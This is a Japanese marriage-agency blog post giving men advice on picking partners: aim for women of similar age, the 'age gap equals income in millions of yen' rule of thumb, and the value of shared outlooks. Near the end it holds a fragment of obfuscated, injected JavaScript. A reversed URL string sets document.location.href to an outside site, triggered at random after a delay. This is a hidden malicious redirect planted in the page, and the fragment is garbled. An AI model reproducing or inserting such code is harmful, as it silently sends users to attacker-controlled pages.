婚活でお相手を選ぶ際のポイント (男性編)

婚活でお相手を選ぶ際のポイント (男性編)

協会カウンセラーの佐田です。

前回はお相手を選ぶ際のポイントとして、男性女性共通したポイントとして共通編をご紹介しました。
まだ共通編を確認頂いてなければ、ぜひ共通編を読んでみて下さい。
お相手選びの基本的な考え方として大切なポイントにもなりますので、ぜひご確認下さいね。

婚活でお相手を選ぶサイトのポイント(共通編)を読む

さて、本題に入りましょう。

今回は、男性が婚活でお相手を選ぶ際に気を付けた方が良いポイントを取り上げたいと思います。

男性がお相手を選ぶ時には、一般的に「容姿」と「年齢」を重視される方が圧倒的に多いです。
これは何も男性に特化した話ではなく、女性もお相手を選ぶ際には当然「容姿」と「年齢」を重視されていますが、 男性の方がより重要視している傾向があります。

確かに年齢が若くて素敵な方は、男性女性問わず魅力的ですよね。
お見合い申込みをしたいというお気持ちは、よく分かります。
しかし、自身と10歳以上年齢が離れている女性に対してお見合いを申込しても、非常に厳しいのが実情です。
では、何故年齢が離れている女性に対してお見合いを申込みしても、非常に厳しいのでしょうか?

女性はどういった男性を希望されているのかを、まずは知ろう!

お相手とのお見合いを成立させるためには、まず女性がどういった男性を希望しているのかを知る必要があります。

上の図は、女性はお相手を選ぶ際にどういった部分を重要視しているのかを一覧化したものです。
実は細かい事を上げれば、「身長」や「趣味」、「家族構成」、「住まい」等々、もっとあります。
しかし基本的には図の7項目を重要視しております。

上図にある年齢の部分を特に注目して頂きたいのですが、女性は基本的に同年代のお相手を希望しているという事です。
男性はどちらかというと、自身より年齢が若い女性を選ぶ傾向が高いですが、女性の場合は価値観や感情の共有を大切にしているためか、同じ年齢のお相手を希望される方が多いです。
言い換えると、若い女性にお見合いを申込するという事は、ライバルとなるのはご自身に近い年齢の男性ではなく、お見合いを申し込んだ女性と近い年齢の男性という事です。

ですので、10歳以上年齢が離れている女性とお見合いを成立させるためには、女性と近い年齢の男性にはない魅力を打ち出していかないと成立し難くなります。

では、お相手選びをする際に、どういった事を考えて選んでいくのが良いのでしょうか?
幾つかポイントを紹介します。

ポイントその1. 女性は年齢が近しいお相手を選ぶ傾向がある事を理解してお相手選びをする

まず、1番に考えなければならないのが、女性が好む傾向を理解してお相手選びをするという事です。
女性は年齢が近しいお相手を選ぶ傾向がある事は先程紹介しましたので、この点を理解して、まずはご自身の年齢から+-4歳のお相手をお見合い候補として選ぶ事をオススメします。
女性のお相手選びの年齢が、おおよそ+-3歳で考えている方が多いので、それに1歳若いお相手をも含めてお相手選びをしていけば、10歳以上も離れた女性よりも、 ぐっとお見合い成立の確率が高くなります。

ポイントその2. 年齢差のある女性を希望する場合は、相応の”武器”が必要

年齢差のある女性とお見合いを成立させたい!という方にですが、先程ご紹介しました通り、ライバルとなるのは、お相手の女性と近しい年齢の男性になります。
年齢というのは婚活において、非常に大きな武器となり、やはり男性女性問わず、若々しい年齢の人は魅力的に映るものです。
また年齢が近しいと、当然話題や価値観なども似通る部分が多くなりますので、そういった近しい年齢によるアドバンテージに勝たなければなりません。

では、どうやって勝つかになりますが、一番はやはり若い年齢の男性にはない、「年収の高さ」や「大人としての魅力」になります。

年齢差=年収×100万分の1の法則って?

結婚相談所の仲人が、よくアドバイスとしてご紹介する事で、「年齢差=年収×100万分の1の法則」というのがあります。
これはお見合いを申込みしたお相手との年齢差を 、年収×1/100万に抑えた方が、よりお見合い成立の角度が高くなるという法則で、たとえば年収500万円の男性が、年下の女性に お見合いを申込する際には、-5歳までの女性なら成立しやすいという事になります。

一方年収は1200万の男性は、-12歳までの年下女性対してお申込みをしても、お見合いが成立しやすいと言われています。
このように年収が1000万円を超えるような男性は、同年代の男性はおろか、女性と同世代の男性に対しても十分魅力的に映る武器となります。

ただし、冒頭に女性がお相手を選ぶ際に重要視する項目をご紹介しました通り、女性は年収以外にも重要視している項目があります。
そのため、年収だけ高ければ、年の差がある女性でも必ずしもお見合い成立して一気に成婚できるというわけではございません。

世の中には、「年の差婚」という言葉がある通り、年齢の離れたカップルは芸能界を筆頭にいらっしゃいます。
ただし、やはり同じ年齢のお相手にはない包容力や、女性をリードする力、経済力や、男性としての魅力も求められてきますので、年齢差のあるお相手にお見合いを成立させるためには、 より一層、プロフィールの充実や男性的魅力を磨く必要があります。

ポイントその3. 大切なのは“共有できる価値観が持てる事と””互いに認め合える関係になれるか”

年齢や容姿でお相手を選ぶ事自体はある意味当然の行為で、例えば彼氏彼女になるという事なら、それでも続けらるかもしれません。
しかし、結婚は一緒に生活空間を共有し、文字通り生涯苦楽を共にしていくという事になりますので、容姿や年齢だけで結婚生活を続ける事は難しいでしょう。
いやいや、そんな事はないという方は、それでも良いかもしれませんが、実際に50年近く結婚生活を続けている方が仰るには、やはり互いが認め合える事ができる事が大切と言います。
お互いが認め合える関係になるという事は、それだけ共有できる価値観を持つことや、相手に対して合わせることができる心を持てるかにかかってくるのではないでしょうか。

始めのうちは容姿や若さで満ち足りているかもしれませんが、人間は年齢を重ねていきますので、容姿も年齢と共に老化いていきますし、結婚当初は若かった年齢も、いずれ若いとはいえない 年齢になっていきます。
それでも結婚生活を続けていくためには、年齢や容姿だけでない”価値観”や”相手を認め合える関係になれるか”がとても大切な事だと思います。

以上、男性がお相手を選ぶ際にどのように考れば良いのか、3つのポイントとして紹介してきました。
これらのポイントは、基本的なポイントになります。
しかし基本的なポイントを抑えずして、お見合いを成立させようというのは、やはりなかなか難しいです。
成婚までの道のりをより確かなものにするためにも、これら3つのポイントを今一度考えながら、婚活を進めてみては如何でしょうか。

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to” data-full-width-responsive=”true”>
婚活パーティー続々開催中!

婚活パーティーの開催スケジュールについては、ぜひ当協会婚活イベント情報ページをご確認下さい。

婚活イベント情報を見る